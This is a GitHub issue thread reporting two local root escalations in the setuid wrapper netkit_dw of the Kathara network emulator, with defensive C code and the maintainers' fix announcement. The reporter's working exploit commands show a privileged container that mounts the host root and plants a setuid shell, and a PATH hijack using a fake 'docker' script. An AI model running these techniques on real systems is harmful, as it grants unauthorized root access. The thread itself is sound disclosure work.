KatharaFramework / Kathara

A lightweight container-based network emulation system.
https://www.kathara.org/
GNU General Public License v3.0

Major Security Issue with Kathara install #59

Closed alexdu59 closed 4 years ago

alexdu59 commented 4 years ago

Hi,

Here are 2 local escalation vulnerabilities because netkit_dw is insecure and installed as setuid root.

Vuln 1: weak string comparisons in netkit_dw.c

Exploitation:

alex@machine:~$ $KATHARAINSTALLDIR/bin/wrapper/bin/netkit_dw run \
--net=host \
 --ipc=host \
--uts=host \
--pid=host \
-i \
--security-opt=seccomp=unconfined \
--privileged \
--rm -v /:/host alpine /usr/sbin/chroot /host /bin/sh -c "echo 0 > /sys/class/net/br-XXXXXXXXXXXX/bridge/ageing_time; \
echo 65528 > /sys/class/net/br-XXXXXXXXXXXX/bridge/group_fwd_mask ; \
cp /bin/sh /tmp/s; chmod a+s /tmp/s"
/bin/sh: 1: cannot create /sys/class/net/br-XXXXXXXXXXXX/bridge/ageing_time: Directory nonexistent
/bin/sh: 1: cannot create /sys/class/net/br-XXXXXXXXXXXX/bridge/group_fwd_mask: Directory nonexistent
alex@machine:~$ /tmp/s -p
# whoami
root
#

Cause of this vulnerability: https://github.com/KatharaFramework/Kathara/blob/master/bin/wrapper/netkit_dw.c#L92 length does not check the user-supplied length (it can be greater, but still match the comparison).

Vuln 2: no environment check in netkit_dw.c

The following command sequence allows you to get a root shell:

alex@machine:/tmp/exploit$ cat docker 
#!/bin/sh
sh
alex@machine:/tmp/exploit$ export PATH=.:$PATH 
alex@machine:/tmp/exploit$ [KATHARA INSTALL DIR]/bin/wrapper/bin/netkit_dw ls
# whoami
root
#

This is because https://github.com/KatharaFramework/Kathara/blob/master/bin/wrapper/netkit_dw.c#L207 does not check the environment (PATH variable). Any docker script in PATH will be executed as root.

Workaround

This vulnerable app should not be installed as setuid root (it's an open backdoor). Users can use sudo or become root when in need of this.

Thanks for the great tool

Alex - 15DgZkqe2Ee2MjAssJjVrN9WCf4LwZGquE
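The two root causes named in the report, a prefix-only string comparison and an unsanitized PATH in a setuid wrapper, are generic bugs in privileged launchers. As an added example that is not part of this issue and not Kathara's own code, the C below shows the weak comparison next to an exact allowlist check, and a launcher that resolves the docker binary from fixed absolute paths and hands the child a minimal environment instead of the caller's. The allowlist contents, the candidate paths and the wrapper's argument layout are assumptions for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical allowlist of docker subcommands a privileged wrapper might
 * permit. This is an assumption for the example, not Kathara's actual list. */
static const char *const ALLOWED[] = { "ps", "images", "logs", NULL };

/* Weak comparison of the class the report describes: only the first
 * strlen(allowed) bytes are compared, so any longer argument that merely
 * starts with an allowed word is accepted. Kept here only to contrast with
 * the exact check below. */
int arg_allowed_prefix(const char *arg)
{
    for (size_t i = 0; ALLOWED[i] != NULL; i++) {
        if (strncmp(arg, ALLOWED[i], strlen(ALLOWED[i])) == 0)
            return 1;
    }
    return 0;
}

/* Exact comparison: the lengths must be equal and every byte must match. */
int arg_allowed_exact(const char *arg)
{
    size_t n = strlen(arg);
    for (size_t i = 0; ALLOWED[i] != NULL; i++) {
        if (n == strlen(ALLOWED[i]) && memcmp(arg, ALLOWED[i], n) == 0)
            return 1;
    }
    return 0;
}

/* Locate the binary to run from a fixed list of absolute paths chosen by the
 * wrapper's author, never from the caller's PATH. Returns the first candidate
 * that is absolute, exists and is executable, or NULL. */
const char *first_executable(const char *const *candidates)
{
    for (size_t i = 0; candidates[i] != NULL; i++) {
        if (candidates[i][0] == '/' && access(candidates[i], X_OK) == 0)
            return candidates[i];
    }
    return NULL;
}

/* Minimal environment handed to the child. The caller's PATH, LD_PRELOAD and
 * everything else is discarded wholesale rather than filtered. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Hypothetical wrapper entry point: argv[1] must be an exact allowlisted
 * subcommand, and docker is executed by absolute path with a clean
 * environment. Only the subcommand is forwarded; any further arguments a
 * real wrapper accepts would need the same exact-match treatment. */
int main(int argc, char **argv)
{
    static const char *const DOCKER_CANDIDATES[] = {
        "/usr/bin/docker", "/usr/local/bin/docker", NULL
    };
    if (argc < 2 || !arg_allowed_exact(argv[1])) {
        fprintf(stderr, "refused: subcommand not in allowlist\n");
        return 2;
    }
    const char *docker = first_executable(DOCKER_CANDIDATES);
    if (docker == NULL) {
        fprintf(stderr, "refused: no trusted docker binary found\n");
        return 2;
    }
    char *child_argv[] = { "docker", argv[1], NULL };
    execve(docker, child_argv, SAFE_ENV);
    perror("execve");
    return 1;
}
```

The exact check rejects "ps --extra" that the prefix check lets through, and the fixed candidate list means a "docker" script placed earlier in the caller's PATH is never consulted. Note that even with these fixes, any account able to reach the docker daemon socket (for instance via the docker group the thread later mentions) can run containers with host mounts, so a wrapper that forwards arbitrary `run` options still needs to constrain those options as strictly as the subcommand itself.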

Kidel commented 4 years ago

Hi @alexdu59 thanks for your submission! Indeed those are 2 big oversights on my part. Thank you for pointing them out so that users are aware of them.

However this week the team will be launching the new version of Katharà that won't be using the wrapper at all.

As we're still dealing with docker, I'd be very happy if you could also take a look in the new version once it's publicly available. In the meantime keep pointing out security issues with the current version, since the new version is still somehow based on this one.

Kidel commented 4 years ago

I'm leaving the issue open until the new version is out, so that it's visible.

lorenzo93 commented 4 years ago

Hi @alexdu59, we have now released the new version of Kathará.

Both the vulnerabilities you figured out are now fixed. The wrapper no longer exists and the Python code will use the Docker API to launch containers.

The need for setuid is now replaced with setgid with the "docker" group. This is needed because this software needs to run on some shared computers where the users do not have sudo access to the system (university lab computers). If we let the student users run sudo commands they could tamper with the system.

I'd be very happy if you could also take a look in the new version code to eventually find out new vulnerabilities.

gmelodie commented 4 years ago

@lorenzo93 Could you link me to the commits where the vulns have been solved?

Kidel commented 4 years ago

From version 2.0.3 (check the tags on master branch or the releases).

It's basically a complete rewrite from there, so linking a specific commit would be pointless.